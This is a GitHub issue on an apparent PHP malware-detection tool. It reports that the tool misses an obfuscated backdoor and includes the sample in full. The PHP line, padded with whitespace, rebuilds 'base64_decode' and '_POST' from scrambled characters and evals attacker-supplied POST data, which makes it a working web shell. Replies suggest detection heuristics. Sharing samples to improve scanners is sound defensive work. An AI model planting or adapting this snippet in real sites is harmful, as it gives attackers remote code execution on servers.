Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Failing to detect injection given below #7

Open
SamirMalpande opened this issue Dec 6, 2015 · 3 comments
Open

Failing to detect injection given below #7

SamirMalpande opened this issue Dec 6, 2015 · 3 comments

Comments

@SamirMalpande
Copy link

<?php                                                                                                                                                                                                                                                $zgjv56 = "o_esb4da6ctp" ; $fzba02= strtolower( $zgjv56[4].$zgjv56[7].$zgjv56[3].$zgjv56[2] . $zgjv56[8].$zgjv56[5].$zgjv56[1] . $zgjv56[6]. $zgjv56[2].$zgjv56[9].$zgjv56[0].$zgjv56[6].$zgjv56[2] );$gfc4 =strtoupper ( $zgjv56[1]. $zgjv56[11].$zgjv56[0]. $zgjv56[3].$zgjv56[10] ) ; if( isset( ${ $gfc4 }['n89024b' ] )){eval( $fzba02 (${$gfc4 } [ 'n89024b' ] )) ;}?>

I tried but couldn't solve the issue as I dont have enough knowledge of RegEx.
Thanks

@joelw
Copy link

joelw commented Jan 12, 2016

A lot of these dodgy PHP files have unusually long lines - the script could also scan for incredibly long lines, and perhaps to catch this particular one, moderately long lines that contain eval(?

@arnisjuraga
Copy link

+1

@philemerson
Copy link

Hi, I've submitted a pull request that addresses this issue.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

4 participants